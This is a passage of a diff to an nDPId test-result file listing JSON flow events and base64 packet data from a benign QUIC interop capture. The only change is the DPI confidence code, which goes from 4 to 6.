Wrj7Lyc79Dh8jXnEXwPmDWmW9CsA4Ch4D72guVA+3h1lyEU8sU8aFmgHNkr\/q70G96HCmPexSIjjNAelbGlp4sZrLx47ftxlllSk4gO\/H46nyfjKhEcW56k2uyhm8V4HNNWN4MpbIc\/Yfvdrngx7qWGlmiM3iNJAh16I3SuDM9QVUwv5ATd2ADCULw+erv80Ft9CMpIikvknhfJ1tVT8peEKIqu9ABaR5GMoofySzXczjefzyNV1DG6SeWJ52+UthtjpveV9nHmvLuYXnvGea6FWcjL6o6DFccw\/MPYc1ZnxJKIVJl7s7PzYYTQJo6uzu7RffuRaN3XTJ5SsTndQcokexpIO49TaPuPvP71185NglDXOKS+OmNgUpybmlmuhSa5FYUv3bbW69PHc\/kF0xzXBLf5+J+46p3Nttr2OqPoeJohEZHRVI\/6AiZJhhgwvTHdeaUhk2xf9gKSkmNoHccjkKGyBBA6zyzqAsmTBzP1bnAJvuFd4p4mvR9AAMpTZsVCt4+YpaevXhHBN80S0SJnJ8GYSPTlTDk5S5LCl8ACcrSmYkJfN2QxrZnjAo\/7X0BI4v65EBgE0aBU2rS5E3V+L7+ROQByi56sXJjXQwyagtcG5I2ud7++g9fSmh383\/sJtnw8\/3hGH5RGGOTtYIFZs7aGYDtNUkdsTHzAAG0WjFBvyjkoOpP88ObPBQn3FH06fbbow+5Nw0s\/GK8dgRoDVdGM2xounw=="} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00645{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1603816434507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434507,"pkt":"pJGxgjQ5PKn0qB\/sht1gChbjBNgRQCABCwcKydWupNP+R2kegH0qBdAYDOmBAM0q4v2zvsWrk\/QBuwTYWzDMCgoKCgiUaZcozIAAbQAARL5emZhgck3iuC3JUSB8iNm2XjGzLpnCsBWAY4Ojdy\/\/5MzHp06LTPIVKnl9FZGbcpBpkxyhd1DLZI+eYqtiEG5aKS74esaWBq8RL8\/CjhVxYArCrDSr+0hp9B1y+nWDHqDWr7MDZcNsju+tb0UHpoKlBgrUvyDGQhAsZRf7r39yd2xxEzbvuwQuuQ3ed9XQC5ng8bRhq403ZCE\/MYrs6MMmD1D8+1P9lcgzES1uneCIpx1HJrBTKP7nMlE81Z1P78Gu9qUmPawKzam5r0zOt6L0vp6aYOWsVv\/E0pz5vx1omUeD8AvBUEEvL\/DEN6PQFWuaU56poUyWE4zmT1fCmpfkQl2t9VM5S0DSjV9+bnc9oeMC84JGWazOmN+3mpmXoZcYRh07YBY2MZ4VnmznfQ80K1ED3kKFM39nycCSACELzlTXDOkJ\/ktY0JyGo358ZvTutgq61KEs8NzcRLv8hDrgsQWV4XjOrAL105eXrA5f784uvCuN2fslFwCeDS0drYeuYLl2X3IPLV7kaNRc+OWAxuENUrLcJjOCAml9vIubSnbhMgY8q\/R\/4iocbJeAZaxcxLWoaBL5Dy6c5RqwmcmQUw2FcUSfarB7m6DGemQRBI6m8IfxS6ULrn9t0ZaJXLuVmX9Bm2oeGECfAf31JRuwVJ9fv26n\/XDb55k0fcO\/t2QAqH5VfQ\/XE6N19TPKrMa5fdi51foR6Wyl8S6hOCeKDO2C9D5n0K\/H4Ph5+pkEEtQs72MottYSPihw0iY\/Fu1RfLXjTA4gqlduvFyO1c3LDQtaJKHg0vklnpsW\/ahvB9sqw1bthHTeyy2PAYGFyd5\/vPsWwu1prQnziZfvuZBv4r85RGoHlFs8OJLDxJP5Unl+UHM1ip66ezVc52fyagwU2p\/dNxSLNLq9ZZZxOqPXoRe4DIj2O5EE+tg2DBKVlqsKlvnpY2O8nYNOUYb06eUwLY7eUmyF5kAFPXCNi2RVkA+F1RffYC4TGxAF6olxMiRrcrs3c\/DtIuA3v9xxQcuNbfPZJrt6p2lhDsnJl0cXW7yahBQ3t8Vob3Fxn8maWSGCm5H4l+b5QiCXjD6aPLMIVSGOxlZuOuMShDlqCqLDm2rrFG\/Ex+58dfI4GZg27KkFrt8yKQU5xP3cDpmgWO8cz42odj5\/XN7ZJEwitO8kjLFt+mYDrVsscfg2UJe74+Xm4LAVvyTj\/b5G5HD1FrTlV0Rk9tUeirRMew509ZVXjW6YJYWL6zO9lgxLgoaV8Gd+v8yh8ZKPFv9a4RV\/5RBt4U2FAY94eskZ2SwKXWETml5yVCj4zuhjsEmm1HcHzPbvj3x0zXEiI2GG4l\/vpR4uTmkPxSOziP4F5ZFOBoaoWk92Q4T6koGjbXJnLz8U3PiyS0Qz4nAzJ2kSKRwz7zoxMiMJyM86M7+1Qefwixc4jngX8nk9EZniCllUXuWjwKpDQHahASkxBg+qPeRKYIoZbq
fouV14QIMHyAa5JM7alvljGBrRgRAZXmcDpn2gAJImko\/gdF0i\/5wYy3K4UZeND0xxE7m532JLVgzS2+HslCBkUca8fdagWqHn+Gho8KaUeJhRfYw0ZgBrosRDMSIh0QMCIiGRjGE5z\/aohA=="} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
00645{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434509,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1603816434509,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434509,"pkt":"pJGxgjQ5PKn0qB\/sht1gAK6QBNgRQCABCwcKydWupNP+R2kegH0gAUgAeBcBAb52Tv\/+BGMdhooBuwTYZF3MCgoKCgiLyuadTBhpMAAARL5Jn8vg\/A\/iHcc5HGyjUHtzYCYh3M+1HzdHtSjFxotnADrnTs2cVW9HALnbbxq+j13Bpa3hTOGyFKAuVKKOVbHcGaJLdNA06DSFzV66GiVnWQJ+1MFEeQ+EHU1tYSy5DynacUlvf1G20dd2kmKE70+xxOTQI+IxdCf39TGHKu+pGUdVYYzStvwWo5npAklpjTRW1hPHPgr+vxfK0tzntAB4tgdSsfnM003avASiWDb+GIQGRqQqd12Z3S73M6xSxbEpPhQs03GVV7j7jPCY+xuSqdE0+RC2M2xTxkDxrKzwifOo5JzioGQ8n1leAaytkPPh7\/6kP3tXKc3zSh+6mDapIcrXvGRPBtxzjcwZlnfC61xJLZ4o\/bDf7VXUn2iqev2r7RfntxDJ4F+CHoqdQU19Agb1DRLZ+44sSsLJRZPe0rMYqmphZb9TR\/CXfZoxmWSMgVmNHVqPhkUDRkBFiFUg2qWtzD6IUIlCi4UB90+3QDAMKbHPStmRV90FoZ4qgb1QWQshIsAOJrfADpMoeQeOvpHnWSBMA4n5tbORKddl3SJHwqDMa\/kYlEza3HmYzKyIekgCLUxBLZMgtxwl0pUeJvIYxMdZF6Znn7pRsQ+GhZyet6ZCOM2ft7uJCMRH5bphpdavcWHTrSt8uZ2iyfo3VofxaZqdzUsHHTpc9bD205szhfCxENgNATF1PGuWlfKJUrPPjUWPpw65iGFR3+hPQ1+ZRRE7orDx2vkC5kOJiEvbv0d6sp6yfMo3tuOn4kXULD2rf5TSc8aqDVZCklaUIbEuKaQv0jni\/XkpmdOw2UlUp3oYLZ9on+kdq43Nf9WrEJ+gfSZP
MUZsyhXXyPRNGMrTBo0SUX31QcOdzW7AQaAXnJRZob+0gus27voTqIEPJh01fxeGPbXNNQ7VzwarPIKHRq1lGIs\/wJwJCsm2hQjq0+K3VFq4cXacrOp5mbdbbDJRXEnCejUnTswq7Ga3dz818NNmVp7FoznVEcHX3RQBfk8eLveHtTEpxIgmvWuj5aaZt+HyxH\/0YALf+wz6lv1s1l\/hg9o2e11OlebH1k7T7awcxgi41AZepwsE50V3GVh5GwIfK89lz9Ro6tly3hUhrsJ2ja1C+A6RBrWVVdcIlZY4BlIcSzf0BUccadkfpP\/Enz0yFkuHTLXTyrmsvl44wgxOvsJrZMwFacqnccJZHwZHWEMkNcxcPbL0Z2U7a3Xa12dEVYYVu1U+X65oQyb2yPkBqMJ+DTB9RU+DnZIynnRzCZZkuvH7Uzn\/zVoVu3fNULVHSP4L+ehdOiOmS0l9r6IzvZQbe+xLjtz2iXbuU36zKNhA17n0gtw0JDOpoFDbD0FwhdY1JUMZx18mcrbFQX02CO02e+BE1Anxc\/TfBIKj2hI2ObT4d57WIvq7cpwJxNdZMuBfjVhAX64+5X4J\/pGNdD3WMTo1fYU74kzII9sWnijVE1WzVIBymOIxdGDOuxbCm5vJaE\/oIJEfaWcfmDwa+jhxCRN2aqJvKC+Iwq2cNN7z7vgOXAZ9SIrdZFgVX8+v9NO3ca9aZtmZoK1IAWW54LXRx4BZnrJKuFoltIkcOXZOYajcaVAMSefQYGNrVyxL8AzXWJ9vEQ=="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434509,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434509,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434512,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1603816434512,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434512,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAtF1AAEARybfAqAGAA3nyNreiAbsE7OwqxgoKCgoIdQnXg0rBLY8AAETSdSNeqCjc+r6H8HOL2nfX9Nl4bt2\/tch\/k3WGu45v6swQRKEZjB5cL5PwQRNSezjETWlwl9x31DElYvPiaTjwEzV3uzPoPSD3RDsDoNIOdJfzM8eeT+YF8HtZxPxl8JfMcAWEYacVzCIRBiKkRKZDpR5dR0ouRtlV3GGe7kt0DtTyh+sL3vELhV2kHz6ly30R\/jiT47NHUtkHKuInrvyxjGqVvAYH34n7tXCBQ6D+AfZH11fptBBQ7utMKjJQetgZnmiyn4jfUks45DQLptmzmM7vacgVM1UXfvDRMiXWFLlgc2aMseReas3HNr0PU1Ye1gi1puLSN2a9gpcRb+O0YMFs0jlKm38N1LBqGTBpyiDu8QECyVyUyl5oER0iWXuG3TbvkN2QQTnAKlJqm0eLVl\/NYu3z\/fNWg32CWUDT2152nd1+esKzcxvEOyGhXuUWhYZ2f900yvrQLHcBQy2bY\/c28n\/CX4U8pxI6NyIasmjHd4xMKoES4DMmjTKarxqquM7dXQbXZLB8En20kKfdQRYHHg+reqWqS2rb8XL4IMSIg8+UsaueMDmzrfUZd\/56R7cXjRlq+VUmt81q5nNnKCMBQ\/7rvr4qOGOZ2CHm9V+uADTNbhvve0l68irgd7nnxQpElTgIyjHyFhvd8KPoLd2HsWPDEewjah\/d5eFL2o2JGexda6drG5JkIeHDe6OWKoobO2FfYrFha9u0nzvL0Czf21A7G+Hktz+GtzDop6GmMw9wX0x7PAWZ9MWVDxJhZqMOzlDofB1A88ZWDukm1Hm6PVA8JMNdUp3UJt5LtDBJLLAEOUN0BNEg9pXHjjKOVZeJN8ZQvkURagzOCo3aTho10tRkW\/\/buLsCCgS9oRh18BVjsveR+UkY4XmNAimeDQhBeVIZNQAbv63kh8fikt2GCen13aqn\/akV6vyA3xP9zH8BrXE0pnxbTdVJRyKZmPMfH+2L5gdn4Inm\/u2BD5yUOdsZkjyDYog2dorLJX+t+PSQ9uXuCwdbDKjjZw9L8++g9YMCmG+DuNoxchSfm4TcUkVs0SgbA\/r\/65YZBCmO6TdtJWtU8H5XFhYFiz1Q78xobCBsvaSvzLLye5aeCDzi6qFTLk0yIv3EAu91rP\/6ul6HmTBVTtG3x8oOLW5WVDEqHHQcQF2G5KsSqr4MhwRqiW0iF9\/6ruIt5OM0L8g5QVUhLrV+wAUx9TrMv+LPDrsvG+Dx5k4p3UodhKDHRb\/7ijQM2ozG8RHNrTry6RrGZAsgdT3BTj1sf\/spjmdgzIF2pwahJa8xi9tbBXrUI1dyXG3+uu21VtbunHyZrZPu9Lqmex5yNEoIMYh8ALvFMBlRu18WIDIANDkgo6akaO98LoftutjwPgqclkRUkaNJO1Z4mpP+D3JcJ7AwJfHttUsGFLMXeHC0rS3Jx8xlGehlDG8Gjx6MbqsW4FVSy5EnAw4UdsWYMoAQZhCtB79ozmulqNFitQkW9QOF9WX6McnEdk8YyUFeo+q
c1Fhx\/ki2cnpObQM3wblVzck3qttvXup8w\/1\/pw0ra8kGRFKBe8QDkHMzVAmkeyW7Mq2NBPRoMSnnA3XB4x1u8DQAzActQ0v3Mr5WeVLSgCf9kg2BakZtD12MZbxnzu5AN97akX7cpg=="} -00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434512,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434512,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
00644{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434518,"flow_last_seen":1603816434518,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434518,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1603816434518,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434518,"pkt":"pJGxgjQ5PKn0qB\/sht1gAXvJBNgRQCABCwcKydWupNP+R2kegH0qAKwAQAAEAALgTP\/+aBmdvkMBuwTYCBnBCgoKCgiEPL7zH8M0IgAARL6eKfaWNoqFUZMIorsrR+PI0mjVI6LMaQTDmquE5419Uqg0GPvALnuSvRL73ivCKJwok1RPqjtpoqHTz45vYlbMW0kHssfjLAjOAUVEArsuhMOirtE412w2RU3RQOLAwrvAO4t8cjd0tkO3FdpXC1+6xCs\/9xwo3urZvY7tv+pPD0m9iy\/nLknxJjrg3PYY9NvAu4T1Yktb5QjJpDpv3IzaFim4vDdRfhCCfZLoy9vkSpiUxLSsp\/4K4guLZKTInOo7dc7L0u0RBuQrBPDDqK4FVSYOh3qSMuIrLfcW45Du9zFvbaiFI1Z3W2Zo1htxNdAgXrRsYiaF2UOsu3EWo22nmt3QVCTvxN40wXQBY474YpdLOSzJ8YT2z1lcFu0wBMnv5wKXxH924c65Vd8jn5+Ysdu9cokS2TeRsJwGH6f8UJWWqASwvtTblbNaAA1rpPkaZ6SKb5\/2SCA8NKsLTMfd9lXR\/TPIRkDa\/UKbcYJHJmruB8l71Ug149yMVHLyQ8PV4VkmIVimW0BwUZuqJHajnymZIECYtitexCiylm89U6E7Qol819M+CywoEZr0V1MUihq4vQCqT5IBPFtDKGbeUpuwEn9i1Sgfq7jW1ZF1lUJIXXxoY0W43gHceg0ibsXFS2Cu4BfCo2ARjzNDy5YP1fNhA\/sgI1UdsrpLLPnxOQD5MfwhgvGMBjmhjcscvgGoJNS3Mx4JzKbLqHshaWSTm\/LyTt9E6jEOyn\/elJ+Uz6TroidfobWRhT8DXti09Tw4xFpYjmFZS+sjqusErMX8BBmq9NavLEXrEkHMrSv7giTu2WivWYnhggGPBzPi9d7guvk48fb
3nlBrDj9TyQ7mUjwRAlCv17XyLwk7KOYmtZZXJ3321lkp3bmJyRSPXB\/cv7ueIG6B+ug3kzrxt89xujNCeWtGdEmI4jIC4JS9GS8VFpY7y1HNYDb2ndNpNf5J7iwIXFXOR2gvyMqscy9rfPY85w\/ZzY6vHurlVpM9w3a5PREuXPDz6VgOdr20pgeNU8H73abMQojEillRJA93bqllSySvQYTvxdmLNI3kPK75CNOjeEksYsdF7tGWuteetV2CpVGc4fAfn7pKXvGC3QvR5rVa7kBRQpXGu246udb5IgCJQW4SWv9D41hRqVUqIhpV+jfVmbkfVSLTLo2RzlmBj7+a2aFtIWbpD7ANiOaRAl7rP5vSHQitoEDWhRQ+6AbGkwcuA7VjuhPuIHlBFBS73grpagTsbteLREgIXGdJVrSiF6wKPaotOPfLYFzLFzvsgAarE+d+Elzh343xLNOiKrK7GDHu3e49eOp9NamSo58Re3QCUDS3FIkTeME1ExL615hIro9N+tcv+\/TrXYarHmxDV0fGJC7I0oBmuLRb11ikCjaYc6FY98talPqVaf+74l6lZuX0twbSRQ9goQdc51kkKoNwIaEylg7FfWyw5YsxdYuXULPPqj5K3zNn8+VwtSMMfxRV+4q2DeFNLKi7SNoJlVxKbF9\/5E6m0hlFWybv1hE9ouYojrE6vOOYfXs3ptJPhGZaJArOV3rdeUnWT8I\/a\/Z7lnYxa5s8i\/zgpZP8zMFkDMjgYLge9GAnCTc\/tmQghNwZWih\/TQ=="} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434518,"flow_last_seen":1603816434518,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434518,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434518,"flow_last_seen":1603816434518,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434518,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 